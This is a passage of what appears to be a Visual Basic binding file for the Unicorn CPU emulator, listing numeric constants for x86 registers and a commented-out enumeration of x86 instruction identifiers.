UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 
245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_ENDING = 248 End Enum 'Public Enum uc_x86_insn ' UC_X86_INS_INVALID = 0 ' UC_X86_INS_AAA = 1 ' UC_X86_INS_AAD = 2 ' UC_X86_INS_AAM = 3 ' UC_X86_INS_AAS = 4 ' UC_X86_INS_FABS = 5 ' UC_X86_INS_ADC = 6 ' UC_X86_INS_ADCX = 7 ' UC_X86_INS_ADD = 8 ' UC_X86_INS_ADDPD = 9 ' UC_X86_INS_ADDPS = 10 ' UC_X86_INS_ADDSD = 11 ' UC_X86_INS_ADDSS = 12 ' UC_X86_INS_ADDSUBPD = 13 ' UC_X86_INS_ADDSUBPS = 14 ' UC_X86_INS_FADD = 15 ' UC_X86_INS_FIADD = 16 ' UC_X86_INS_FADDP = 17 ' UC_X86_INS_ADOX = 18 ' UC_X86_INS_AESDECLAST = 19 ' UC_X86_INS_AESDEC = 20 ' UC_X86_INS_AESENCLAST = 21 ' UC_X86_INS_AESENC = 22 ' UC_X86_INS_AESIMC = 23 ' UC_X86_INS_AESKEYGENASSIST = 24 ' UC_X86_INS_AND = 25 ' UC_X86_INS_ANDN = 26 ' UC_X86_INS_ANDNPD = 27 ' UC_X86_INS_ANDNPS = 28 ' UC_X86_INS_ANDPD = 29 ' UC_X86_INS_ANDPS = 30 ' UC_X86_INS_ARPL = 31 ' UC_X86_INS_BEXTR = 32 ' UC_X86_INS_BLCFILL = 33 ' UC_X86_INS_BLCI = 34 ' UC_X86_INS_BLCIC = 35 ' UC_X86_INS_BLCMSK = 36 ' UC_X86_INS_BLCS = 37 ' UC_X86_INS_BLENDPD = 38 ' UC_X86_INS_BLENDPS = 39 ' UC_X86_INS_BLENDVPD = 40 ' UC_X86_INS_BLENDVPS = 41 ' UC_X86_INS_BLSFILL = 42 ' UC_X86_INS_BLSI = 43 ' UC_X86_INS_BLSIC = 44 ' UC_X86_INS_BLSMSK = 45 ' UC_X86_INS_BLSR = 46 ' UC_X86_INS_BOUND = 47 ' UC_X86_INS_BSF = 48 ' UC_X86_INS_BSR = 49 ' UC_X86_INS_BSWAP = 50 ' UC_X86_INS_BT = 51 ' UC_X86_INS_BTC = 52 ' UC_X86_INS_BTR = 53 ' UC_X86_INS_BTS = 54 ' UC_X86_INS_BZHI = 55 ' UC_X86_INS_CALL = 56 ' UC_X86_INS_CBW = 57 ' UC_X86_INS_CDQ = 58 ' UC_X86_INS_CDQE = 59 ' UC_X86_INS_FCHS = 60 ' UC_X86_INS_CLAC = 61 ' UC_X86_INS_CLC = 62 ' UC_X86_INS_CLD = 63 ' UC_X86_INS_CLFLUSH = 64 ' UC_X86_INS_CLFLUSHOPT = 65 ' UC_X86_INS_CLGI = 66 ' UC_X86_INS_CLI = 67 ' UC_X86_INS_CLTS = 68 ' UC_X86_INS_CLWB = 69 ' UC_X86_INS_CMC = 70 ' UC_X86_INS_CMOVA = 71 ' UC_X86_INS_CMOVAE = 72 ' UC_X86_INS_CMOVB = 73 ' UC_X86_INS_CMOVBE = 74 ' UC_X86_INS_FCMOVBE = 75 ' UC_X86_INS_FCMOVB = 76 ' UC_X86_INS_CMOVE = 77 ' UC_X86_INS_FCMOVE = 78 ' UC_X86_INS_CMOVG = 79 ' UC_X86_INS_CMOVGE = 80 ' UC_X86_INS_CMOVL = 81 ' UC_X86_INS_CMOVLE = 82 ' UC_X86_INS_FCMOVNBE = 83 ' UC_X86_INS_FCMOVNB = 84 ' UC_X86_INS_CMOVNE = 85 ' UC_X86_INS_FCMOVNE = 86 ' UC_X86_INS_CMOVNO = 87 ' UC_X86_INS_CMOVNP = 88 ' UC_X86_INS_FCMOVNU = 89 ' UC_X86_INS_CMOVNS = 90 ' UC_X86_INS_CMOVO = 91 ' UC_X86_INS_CMOVP = 92 ' UC_X86_INS_FCMOVU = 93 ' UC_X86_INS_CMOVS = 94 ' UC_X86_INS_CMP = 95 ' UC_X86_INS_CMPPD = 96 ' UC_X86_INS_CMPPS = 97 ' UC_X86_INS_CMPSB = 98 ' UC_X86_INS_CMPSD = 99 ' UC_X86_INS_CMPSQ = 100 ' UC_X86_INS_CMPSS = 101 ' UC_X86_INS_CMPSW = 102 ' UC_X86_INS_CMPXCHG16B = 103 ' UC_X86_INS_CMPXCHG = 104 ' UC_X86_INS_CMPXCHG8B = 105 ' UC_X86_INS_COMISD = 106 ' UC_X86_INS_COMISS = 107 ' UC_X86_INS_FCOMP = 108 ' UC_X86_INS_FCOMPI = 109 ' UC_X86_INS_FCOMI = 110 ' UC_X86_INS_FCOM = 111 ' UC_X86_INS_FCOS = 112 ' UC_X86_INS_CPUID = 113 ' UC_X86_INS_CQO = 114 ' UC_X86_INS_CRC32 = 115 ' UC_X86_INS_CVTDQ2PD = 116 ' UC_X86_INS_CVTDQ2PS = 117 ' UC_X86_INS_CVTPD2DQ = 118 ' UC_X86_INS_CVTPD2PS = 119 ' UC_X86_INS_CVTPS2DQ = 120 ' UC_X86_INS_CVTPS2PD = 121 ' UC_X86_INS_CVTSD2SI = 122 ' UC_X86_INS_CVTSD2SS = 123 ' UC_X86_INS_CVTSI2SD = 124 ' UC_X86_INS_CVTSI2SS = 125 ' UC_X86_INS_CVTSS2SD = 126 ' UC_X86_INS_CVTSS2SI = 127 ' UC_X86_INS_CVTTPD2DQ = 128 ' UC_X86_INS_CVTTPS2DQ = 129 ' UC_X86_INS_CVTTSD2SI = 130 ' UC_X86_INS_CVTTSS2SI = 131 ' UC_X86_INS_CWD = 132 ' UC_X86_INS_CWDE = 133 ' UC_X86_INS_DAA = 134 ' UC_X86_INS_DAS = 135 ' UC_X86_INS_DATA16 = 136 ' UC_X86_INS_DEC = 137 ' UC_X86_INS_DIV = 138 ' 
UC_X86_INS_DIVPD = 139 ' UC_X86_INS_DIVPS = 140 ' UC_X86_INS_FDIVR = 141 ' UC_X86_INS_FIDIVR = 142 ' UC_X86_INS_FDIVRP = 143 ' UC_X86_INS_DIVSD = 144 ' UC_X86_INS_DIVSS = 145 ' UC_X86_INS_FDIV = 146 ' UC_X86_INS_FIDIV = 147 ' UC_X86_INS_FDIVP = 148 ' UC_X86_INS_DPPD = 149 ' UC_X86_INS_DPPS = 150 ' UC_X86_INS_RET = 151 ' UC_X86_INS_ENCLS = 152 ' UC_X86_INS_ENCLU = 153 ' UC_X86_INS_ENTER = 154 ' UC_X86_INS_EXTRACTPS = 155 ' UC_X86_INS_EXTRQ = 156 ' UC_X86_INS_F2XM1 = 157 ' UC_X86_INS_LCALL = 158 ' UC_X86_INS_LJMP = 159 ' UC_X86_INS_FBLD = 160 ' UC_X86_INS_FBSTP = 161 ' UC_X86_INS_FCOMPP = 162 ' UC_X86_INS_FDECSTP = 163 ' UC_X86_INS_FEMMS = 164 ' UC_X86_INS_FFREE = 165 ' UC_X86_INS_FICOM = 166 ' UC_X86_INS_FICOMP = 167 ' UC_X86_INS_FINCSTP = 168 ' UC_X86_INS_FLDCW = 169 ' UC_X86_INS_FLDENV = 170 ' UC_X86_INS_FLDL2E = 171 ' UC_X86_INS_FLDL2T = 172 ' UC_X86_INS_FLDLG2 = 173 ' UC_X86_INS_FLDLN2 = 174 ' UC_X86_INS_FLDPI = 175 ' UC_X86_INS_FNCLEX = 176 ' UC_X86_INS_FNINIT = 177 ' UC_X86_INS_FNOP = 178 ' UC_X86_INS_FNSTCW = 179 ' UC_X86_INS_FNSTSW = 180 ' UC_X86_INS_FPATAN = 181 ' UC_X86_INS_FPREM = 182 ' UC_X86_INS_FPREM1 = 183 ' UC_X86_INS_FPTAN = 184 ' UC_X86_INS_FFREEP = 185 ' UC_X86_INS_FRNDINT = 186 ' UC_X86_INS_FRSTOR = 187 ' UC_X86_INS_FNSAVE = 188 ' UC_X86_INS_FSCALE = 189 ' UC_X86_INS_FSETPM = 190 ' UC_X86_INS_FSINCOS = 191 ' UC_X86_INS_FNSTENV = 192 ' UC_X86_INS_FXAM = 193 ' UC_X86_INS_FXRSTOR = 194 ' UC_X86_INS_FXRSTOR64 = 195 ' UC_X86_INS_FXSAVE = 196 ' UC_X86_INS_FXSAVE64 = 197 ' UC_X86_INS_FXTRACT = 198 ' UC_X86_INS_FYL2X = 199 ' UC_X86_INS_FYL2XP1 = 200 ' UC_X86_INS_MOVAPD = 201 ' UC_X86_INS_MOVAPS = 202 ' UC_X86_INS_ORPD = 203 ' UC_X86_INS_ORPS = 204 ' UC_X86_INS_VMOVAPD = 205 ' UC_X86_INS_VMOVAPS = 206 ' UC_X86_INS_XORPD = 207 ' UC_X86_INS_XORPS = 208 ' UC_X86_INS_GETSEC = 209 ' UC_X86_INS_HADDPD = 210 ' UC_X86_INS_HADDPS = 211 ' UC_X86_INS_HLT = 212 ' UC_X86_INS_HSUBPD = 213 ' UC_X86_INS_HSUBPS = 214 ' UC_X86_INS_IDIV = 215 ' UC_X86_INS_FILD = 216 ' UC_X86_INS_IMUL = 217 ' UC_X86_INS_IN = 218 ' UC_X86_INS_INC = 219 ' UC_X86_INS_INSB = 220 ' UC_X86_INS_INSERTPS = 221 ' UC_X86_INS_INSERTQ = 222 ' UC_X86_INS_INSD = 223 ' UC_X86_INS_INSW = 224 ' UC_X86_INS_INT = 225 ' UC_X86_INS_INT1 = 226 ' UC_X86_INS_INT3 = 227 ' UC_X86_INS_INTO = 228 ' UC_X86_INS_INVD = 229 ' UC_X86_INS_INVEPT = 230 ' UC_X86_INS_INVLPG = 231 ' UC_X86_INS_INVLPGA = 232 ' UC_X86_INS_INVPCID = 233 ' UC_X86_INS_INVVPID = 234 ' UC_X86_INS_IRET = 235 ' UC_X86_INS_IRETD = 236 ' UC_X86_INS_IRETQ = 237 ' UC_X86_INS_FISTTP = 238 ' UC_X86_INS_FIST = 239 ' UC_X86_INS_FISTP = 240 ' UC_X86_INS_UCOMISD = 241 ' UC_X86_INS_UCOMISS = 242 ' UC_X86_INS_VCOMISD = 243 ' UC_X86_INS_VCOMISS = 244 ' UC_X86_INS_VCVTSD2SS = 245 ' UC_X86_INS_VCVTSI2SD = 246 ' UC_X86_INS_VCVTSI2SS = 247 ' UC_X86_INS_VCVTSS2SD = 248 ' UC_X86_INS_VCVTTSD2SI = 249 ' UC_X86_INS_VCVTTSD2USI = 250 ' UC_X86_INS_VCVTTSS2SI = 251 ' UC_X86_INS_VCVTTSS2USI = 252 ' UC_X86_INS_VCVTUSI2SD = 253 ' UC_X86_INS_VCVTUSI2SS = 254 ' UC_X86_INS_VUCOMISD = 255 ' UC_X86_INS_VUCOMISS = 256 ' UC_X86_INS_JAE = 257 ' UC_X86_INS_JA = 258 ' UC_X86_INS_JBE = 259 ' UC_X86_INS_JB = 260 ' UC_X86_INS_JCXZ = 261 ' UC_X86_INS_JECXZ = 262 ' UC_X86_INS_JE = 263 ' UC_X86_INS_JGE = 264 ' UC_X86_INS_JG = 265 ' UC_X86_INS_JLE = 266 ' UC_X86_INS_JL = 267 ' UC_X86_INS_JMP = 268 ' UC_X86_INS_JNE = 269 ' UC_X86_INS_JNO = 270 ' UC_X86_INS_JNP = 271 ' UC_X86_INS_JNS = 272 ' UC_X86_INS_JO = 273 ' UC_X86_INS_JP = 274 ' UC_X86_INS_JRCXZ = 275 ' UC_X86_INS_JS = 276 ' UC_X86_INS_KANDB = 277 ' UC_X86_INS_KANDD = 
278 ' UC_X86_INS_KANDNB = 279 ' UC_X86_INS_KANDND = 280 ' UC_X86_INS_KANDNQ = 281 ' UC_X86_INS_KANDNW = 282 ' UC_X86_INS_KANDQ = 283 ' UC_X86_INS_KANDW = 284 ' UC_X86_INS_KMOVB = 285 ' UC_X86_INS_KMOVD = 286 ' UC_X86_INS_KMOVQ = 287 ' UC_X86_INS_KMOVW = 288 ' UC_X86_INS_KNOTB = 289 ' UC_X86_INS_KNOTD = 290 ' UC_X86_INS_KNOTQ = 291 ' UC_X86_INS_KNOTW = 292 ' UC_X86_INS_KORB = 293 ' UC_X86_INS_KORD = 294 ' UC_X86_INS_KORQ = 295 ' UC_X86_INS_KORTESTB = 296 ' UC_X86_INS_KORTESTD = 297 ' UC_X86_INS_KORTESTQ = 298 ' UC_X86_INS_KORTESTW = 299 ' UC_X86_INS_KORW = 300 ' UC_X86_INS_KSHIFTLB = 301 ' UC_X86_INS_KSHIFTLD = 302 ' UC_X86_INS_KSHIFTLQ = 303 ' UC_X86_INS_KSHIFTLW = 304 ' UC_X86_INS_KSHIFTRB = 305 ' UC_X86_INS_KSHIFTRD = 306 ' UC_X86_INS_KSHIFTRQ = 307 ' UC_X86_INS_KSHIFTRW = 308 ' UC_X86_INS_KUNPCKBW = 309 ' UC_X86_INS_KXNORB = 310 ' UC_X86_INS_KXNORD = 311 ' UC_X86_INS_KXNORQ = 312 ' UC_X86_INS_KXNORW = 313 ' UC_X86_INS_KXORB = 314 ' UC_X86_INS_KXORD = 315 ' UC_X86_INS_KXORQ = 316 ' UC_X86_INS_KXORW = 317 ' UC_X86_INS_LAHF = 318 ' UC_X86_INS_LAR = 319 ' UC_X86_INS_LDDQU = 320 ' UC_X86_INS_LDMXCSR = 321 ' UC_X86_INS_LDS = 322 ' UC_X86_INS_FLDZ = 323 ' UC_X86_INS_FLD1 = 324 ' UC_X86_INS_FLD = 325 ' UC_X86_INS_LEA = 326 ' UC_X86_INS_LEAVE = 327 ' UC_X86_INS_LES = 328 ' UC_X86_INS_LFENCE = 329 ' UC_X86_INS_LFS = 330 ' UC_X86_INS_LGDT = 331 ' UC_X86_INS_LGS = 332 ' UC_X86_INS_LIDT = 333 ' UC_X86_INS_LLDT = 334 ' UC_X86_INS_LMSW = 335 ' UC_X86_INS_OR = 336 ' UC_X86_INS_SUB = 337 ' UC_X86_INS_XOR = 338 ' UC_X86_INS_LODSB = 339 ' UC_X86_INS_LODSD = 340 ' UC_X86_INS_LODSQ = 341 ' UC_X86_INS_LODSW = 342 ' UC_X86_INS_LOOP = 343 ' UC_X86_INS_LOOPE = 344 ' UC_X86_INS_LOOPNE = 345 ' UC_X86_INS_RETF = 346 ' UC_X86_INS_RETFQ = 347 ' UC_X86_INS_LSL = 348 ' UC_X86_INS_LSS = 349 ' UC_X86_INS_LTR = 350 ' UC_X86_INS_XADD = 351 ' UC_X86_INS_LZCNT = 352 ' UC_X86_INS_MASKMOVDQU = 353 ' UC_X86_INS_MAXPD = 354 ' UC_X86_INS_MAXPS = 355 ' UC_X86_INS_MAXSD = 356 ' UC_X86_INS_MAXSS = 357 ' UC_X86_INS_MFENCE = 358 ' UC_X86_INS_MINPD = 359 ' UC_X86_INS_MINPS = 360 ' UC_X86_INS_MINSD = 361 ' UC_X86_INS_MINSS = 362 ' UC_X86_INS_CVTPD2PI = 363 ' UC_X86_INS_CVTPI2PD = 364 ' UC_X86_INS_CVTPI2PS = 365 ' UC_X86_INS_CVTPS2PI = 366 ' UC_X86_INS_CVTTPD2PI = 367 ' UC_X86_INS_CVTTPS2PI = 368 ' UC_X86_INS_EMMS = 369 ' UC_X86_INS_MASKMOVQ = 370 ' UC_X86_INS_MOVD = 371 ' UC_X86_INS_MOVDQ2Q = 372 ' UC_X86_INS_MOVNTQ = 373 ' UC_X86_INS_MOVQ2DQ = 374 ' UC_X86_INS_MOVQ = 375 ' UC_X86_INS_PABSB = 376 ' UC_X86_INS_PABSD = 377 ' UC_X86_INS_PABSW = 378 ' UC_X86_INS_PACKSSDW = 379 ' UC_X86_INS_PACKSSWB = 380 ' UC_X86_INS_PACKUSWB = 381 ' UC_X86_INS_PADDB = 382 ' UC_X86_INS_PADDD = 383 ' UC_X86_INS_PADDQ = 384 ' UC_X86_INS_PADDSB = 385 ' UC_X86_INS_PADDSW = 386 ' UC_X86_INS_PADDUSB = 387 ' UC_X86_INS_PADDUSW = 388 ' UC_X86_INS_PADDW = 389 ' UC_X86_INS_PALIGNR = 390 ' UC_X86_INS_PANDN = 391 ' UC_X86_INS_PAND = 392 ' UC_X86_INS_PAVGB = 393 ' UC_X86_INS_PAVGW = 394 ' UC_X86_INS_PCMPEQB = 395 ' UC_X86_INS_PCMPEQD = 396 ' UC_X86_INS_PCMPEQW = 397 ' UC_X86_INS_PCMPGTB = 398 ' UC_X86_INS_PCMPGTD = 399 ' UC_X86_INS_PCMPGTW = 400 ' UC_X86_INS_PEXTRW = 401 ' UC_X86_INS_PHADDSW = 402 ' UC_X86_INS_PHADDW = 403 ' UC_X86_INS_PHADDD = 404 ' UC_X86_INS_PHSUBD = 405 ' UC_X86_INS_PHSUBSW = 406 ' UC_X86_INS_PHSUBW = 407 ' UC_X86_INS_PINSRW = 408 ' UC_X86_INS_PMADDUBSW = 409 ' UC_X86_INS_PMADDWD = 410 ' UC_X86_INS_PMAXSW = 411 ' UC_X86_INS_PMAXUB = 412 ' UC_X86_INS_PMINSW = 413 ' UC_X86_INS_PMINUB = 414 ' UC_X86_INS_PMOVMSKB = 415 ' UC_X86_INS_PMULHRSW = 416 ' 
UC_X86_INS_PMULHUW = 417 ' UC_X86_INS_PMULHW = 418 ' UC_X86_INS_PMULLW = 419 ' UC_X86_INS_PMULUDQ = 420 ' UC_X86_INS_POR = 421 ' UC_X86_INS_PSADBW = 422 ' UC_X86_INS_PSHUFB = 423 ' UC_X86_INS_PSHUFW = 424 ' UC_X86_INS_PSIGNB = 425 ' UC_X86_INS_PSIGND = 426 ' UC_X86_INS_PSIGNW = 427 ' UC_X86_INS_PSLLD = 428 ' UC_X86_INS_PSLLQ = 429 ' UC_X86_INS_PSLLW = 430 ' UC_X86_INS_PSRAD = 431 ' UC_X86_INS_PSRAW = 432 ' UC_X86_INS_PSRLD = 433 ' UC_X86_INS_PSRLQ = 434 ' UC_X86_INS_PSRLW = 435 ' UC_X86_INS_PSUBB = 436 ' UC_X86_INS_PSUBD = 437 ' UC_X86_INS_PSUBQ = 438 ' UC_X86_INS_PSUBSB = 439 ' UC_X86_INS_PSUBSW = 440 ' UC_X86_INS_PSUBUSB = 441 ' UC_X86_INS_PSUBUSW = 442 ' UC_X86_INS_PSUBW = 443 ' UC_X86_INS_PUNPCKHBW = 444 ' UC_X86_INS_PUNPCKHDQ = 445 ' UC_X86_INS_PUNPCKHWD = 446 ' UC_X86_INS_PUNPCKLBW = 447 ' UC_X86_INS_PUNPCKLDQ = 448 ' UC_X86_INS_PUNPCKLWD = 449 ' UC_X86_INS_PXOR = 450 ' UC_X86_INS_MONITOR = 451 ' UC_X86_INS_MONTMUL = 452 ' UC_X86_INS_MOV = 453 ' UC_X86_INS_MOVABS = 454 ' UC_X86_INS_MOVBE = 455 ' UC_X86_INS_MOVDDUP = 456 ' UC_X86_INS_MOVDQA = 457 ' UC_X86_INS_MOVDQU = 458 ' UC_X86_INS_MOVHLPS = 459 ' UC_X86_INS_MOVHPD = 460 ' UC_X86_INS_MOVHPS = 461 ' UC_X86_INS_MOVLHPS = 462 ' UC_X86_INS_MOVLPD = 463 ' UC_X86_INS_MOVLPS = 464 ' UC_X86_INS_MOVMSKPD = 465 ' UC_X86_INS_MOVMSKPS = 466 ' UC_X86_INS_MOVNTDQA = 467 ' UC_X86_INS_MOVNTDQ = 468 ' UC_X86_INS_MOVNTI = 469 ' UC_X86_INS_MOVNTPD = 470 ' UC_X86_INS_MOVNTPS = 471 ' UC_X86_INS_MOVNTSD = 472 ' UC_X86_INS_MOVNTSS = 473 ' UC_X86_INS_MOVSB = 474 ' UC_X86_INS_MOVSD = 475 ' UC_X86_INS_MOVSHDUP = 476 ' UC_X86_INS_MOVSLDUP = 477 ' UC_X86_INS_MOVSQ = 478 ' UC_X86_INS_MOVSS = 479 ' UC_X86_INS_MOVSW = 480 ' UC_X86_INS_MOVSX = 481 ' UC_X86_INS_MOVSXD = 482 ' UC_X86_INS_MOVUPD = 483 ' UC_X86_INS_MOVUPS = 484 ' UC_X86_INS_MOVZX = 485 ' UC_X86_INS_MPSADBW = 486 ' UC_X86_INS_MUL = 487 ' UC_X86_INS_MULPD = 488 ' UC_X86_INS_MULPS = 489 ' UC_X86_INS_MULSD = 490 ' UC_X86_INS_MULSS = 491 ' UC_X86_INS_MULX = 492 ' UC_X86_INS_FMUL = 493 ' UC_X86_INS_FIMUL = 494 ' UC_X86_INS_FMULP = 495 ' UC_X86_INS_MWAIT = 496 ' UC_X86_INS_NEG = 497 ' UC_X86_INS_NOP = 498 ' UC_X86_INS_NOT = 499 ' UC_X86_INS_OUT = 500 ' UC_X86_INS_OUTSB = 501 ' UC_X86_INS_OUTSD = 502 ' UC_X86_INS_OUTSW = 503 ' UC_X86_INS_PACKUSDW = 504 ' UC_X86_INS_PAUSE = 505 ' UC_X86_INS_PAVGUSB = 506 ' UC_X86_INS_PBLENDVB = 507 ' UC_X86_INS_PBLENDW = 508 ' UC_X86_INS_PCLMULQDQ = 509 ' UC_X86_INS_PCMPEQQ = 510 ' UC_X86_INS_PCMPESTRI = 511 ' UC_X86_INS_PCMPESTRM = 512 ' UC_X86_INS_PCMPGTQ = 513 ' UC_X86_INS_PCMPISTRI = 514 ' UC_X86_INS_PCMPISTRM = 515 ' UC_X86_INS_PCOMMIT = 516 ' UC_X86_INS_PDEP = 517 ' UC_X86_INS_PEXT = 518 ' UC_X86_INS_PEXTRB = 519 ' UC_X86_INS_PEXTRD = 520 ' UC_X86_INS_PEXTRQ = 521 ' UC_X86_INS_PF2ID = 522 ' UC_X86_INS_PF2IW = 523 ' UC_X86_INS_PFACC = 524 ' UC_X86_INS_PFADD = 525 ' UC_X86_INS_PFCMPEQ = 526 ' UC_X86_INS_PFCMPGE = 527 ' UC_X86_INS_PFCMPGT = 528 ' UC_X86_INS_PFMAX = 529 ' UC_X86_INS_PFMIN = 530 ' UC_X86_INS_PFMUL = 531 ' UC_X86_INS_PFNACC = 532 ' UC_X86_INS_PFPNACC = 533 ' UC_X86_INS_PFRCPIT1 = 534 ' UC_X86_INS_PFRCPIT2 = 535 ' UC_X86_INS_PFRCP = 536 ' UC_X86_INS_PFRSQIT1 = 537 ' UC_X86_INS_PFRSQRT = 538 ' UC_X86_INS_PFSUBR = 539 ' UC_X86_INS_PFSUB = 540 ' UC_X86_INS_PHMINPOSUW = 541 ' UC_X86_INS_PI2FD = 542 ' UC_X86_INS_PI2FW = 543 ' UC_X86_INS_PINSRB = 544 ' UC_X86_INS_PINSRD = 545 ' UC_X86_INS_PINSRQ = 546 ' UC_X86_INS_PMAXSB = 547 ' UC_X86_INS_PMAXSD = 548 ' UC_X86_INS_PMAXUD = 549 ' UC_X86_INS_PMAXUW = 550 ' UC_X86_INS_PMINSB = 551 ' UC_X86_INS_PMINSD = 552 ' 
UC_X86_INS_PMINUD = 553 ' UC_X86_INS_PMINUW = 554 ' UC_X86_INS_PMOVSXBD = 555 ' UC_X86_INS_PMOVSXBQ = 556 ' UC_X86_INS_PMOVSXBW = 557 ' UC_X86_INS_PMOVSXDQ = 558 ' UC_X86_INS_PMOVSXWD = 559 ' UC_X86_INS_PMOVSXWQ = 560 ' UC_X86_INS_PMOVZXBD = 561 ' UC_X86_INS_PMOVZXBQ = 562 ' UC_X86_INS_PMOVZXBW = 563 ' UC_X86_INS_PMOVZXDQ = 564 ' UC_X86_INS_PMOVZXWD = 565 ' UC_X86_INS_PMOVZXWQ = 566 ' UC_X86_INS_PMULDQ = 567 ' UC_X86_INS_PMULHRW = 568 ' UC_X86_INS_PMULLD = 569 ' UC_X86_INS_POP = 570 ' UC_X86_INS_POPAW = 571 ' UC_X86_INS_POPAL = 572 ' UC_X86_INS_POPCNT = 573 ' UC_X86_INS_POPF = 574 ' UC_X86_INS_POPFD = 575 ' UC_X86_INS_POPFQ = 576 ' UC_X86_INS_PREFETCH = 577 ' UC_X86_INS_PREFETCHNTA = 578 ' UC_X86_INS_PREFETCHT0 = 579 ' UC_X86_INS_PREFETCHT1 = 580 ' UC_X86_INS_PREFETCHT2 = 581 ' UC_X86_INS_PREFETCHW = 582 ' UC_X86_INS_PSHUFD = 583 ' UC_X86_INS_PSHUFHW = 584 ' UC_X86_INS_PSHUFLW = 585 ' UC_X86_INS_PSLLDQ = 586 ' UC_X86_INS_PSRLDQ = 587 ' UC_X86_INS_PSWAPD = 588 ' UC_X86_INS_PTEST = 589 ' UC_X86_INS_PUNPCKHQDQ = 590 ' UC_X86_INS_PUNPCKLQDQ = 591 ' UC_X86_INS_PUSH = 592 ' UC_X86_INS_PUSHAW = 593 ' UC_X86_INS_PUSHAL = 594 ' UC_X86_INS_PUSHF = 595 ' UC_X86_INS_PUSHFD = 596 ' UC_X86_INS_PUSHFQ = 597 ' UC_X86_INS_RCL = 598 ' UC_X86_INS_RCPPS = 599 ' UC_X86_INS_RCPSS = 600 ' UC_X86_INS_RCR = 601 ' UC_X86_INS_RDFSBASE = 602 ' UC_X86_INS_RDGSBASE = 603 ' UC_X86_INS_RDMSR = 604 ' UC_X86_INS_RDPMC = 605 ' UC_X86_INS_RDRAND = 606 ' UC_X86_INS_RDSEED = 607 ' UC_X86_INS_RDTSC = 608 ' UC_X86_INS_RDTSCP = 609 ' UC_X86_INS_ROL = 610 ' UC_X86_INS_ROR = 611 ' UC_X86_INS_RORX = 612 ' UC_X86_INS_ROUNDPD = 613 ' UC_X86_INS_ROUNDPS = 614 ' UC_X86_INS_ROUNDSD = 615 ' UC_X86_INS_ROUNDSS = 616 ' UC_X86_INS_RSM = 617 ' UC_X86_INS_RSQRTPS = 618 ' UC_X86_INS_RSQRTSS = 619 ' UC_X86_INS_SAHF = 620 ' UC_X86_INS_SAL = 621 ' UC_X86_INS_SALC = 622 ' UC_X86_INS_SAR = 623 ' UC_X86_INS_SARX = 624 ' UC_X86_INS_SBB = 625 ' UC_X86_INS_SCASB = 626 ' UC_X86_INS_SCASD = 627 ' UC_X86_INS_SCASQ = 628 ' UC_X86_INS_SCASW = 629 ' UC_X86_INS_SETAE = 630 ' UC_X86_INS_SETA = 631 ' UC_X86_INS_SETBE = 632 ' UC_X86_INS_SETB = 633 ' UC_X86_INS_SETE = 634 ' UC_X86_INS_SETGE = 635 ' UC_X86_INS_SETG = 636 ' UC_X86_INS_SETLE = 637 ' UC_X86_INS_SETL = 638 ' UC_X86_INS_SETNE = 639 ' UC_X86_INS_SETNO = 640 ' UC_X86_INS_SETNP = 641 ' UC_X86_INS_SETNS = 642 ' UC_X86_INS_SETO = 643 ' UC_X86_INS_SETP = 644 ' UC_X86_INS_SETS = 645 ' UC_X86_INS_SFENCE = 646 ' UC_X86_INS_SGDT = 647 ' UC_X86_INS_SHA1MSG1 = 648 ' UC_X86_INS_SHA1MSG2 = 649 ' UC_X86_INS_SHA1NEXTE = 650 ' UC_X86_INS_SHA1RNDS4 = 651 ' UC_X86_INS_SHA256MSG1 = 652 ' UC_X86_INS_SHA256MSG2 = 653 ' UC_X86_INS_SHA256RNDS2 = 654 ' UC_X86_INS_SHL = 655 ' UC_X86_INS_SHLD = 656 ' UC_X86_INS_SHLX = 657 ' UC_X86_INS_SHR = 658 ' UC_X86_INS_SHRD = 659 ' UC_X86_INS_SHRX = 660 ' UC_X86_INS_SHUFPD = 661 ' UC_X86_INS_SHUFPS = 662 ' UC_X86_INS_SIDT = 663 ' UC_X86_INS_FSIN = 664 ' UC_X86_INS_SKINIT = 665 ' UC_X86_INS_SLDT = 666 ' UC_X86_INS_SMSW = 667 ' UC_X86_INS_SQRTPD = 668 ' UC_X86_INS_SQRTPS = 669 ' UC_X86_INS_SQRTSD = 670 ' UC_X86_INS_SQRTSS = 671 ' UC_X86_INS_FSQRT = 672 ' UC_X86_INS_STAC = 673 ' UC_X86_INS_STC = 674 ' UC_X86_INS_STD = 675 ' UC_X86_INS_STGI = 676 ' UC_X86_INS_STI = 677 ' UC_X86_INS_STMXCSR = 678 ' UC_X86_INS_STOSB = 679 ' UC_X86_INS_STOSD = 680 ' UC_X86_INS_STOSQ = 681 ' UC_X86_INS_STOSW = 682 ' UC_X86_INS_STR = 683 ' UC_X86_INS_FST = 684 ' UC_X86_INS_FSTP = 685 ' UC_X86_INS_FSTPNCE = 686 ' UC_X86_INS_FXCH = 687 ' UC_X86_INS_SUBPD = 688 ' UC_X86_INS_SUBPS = 689 ' UC_X86_INS_FSUBR = 690 ' 
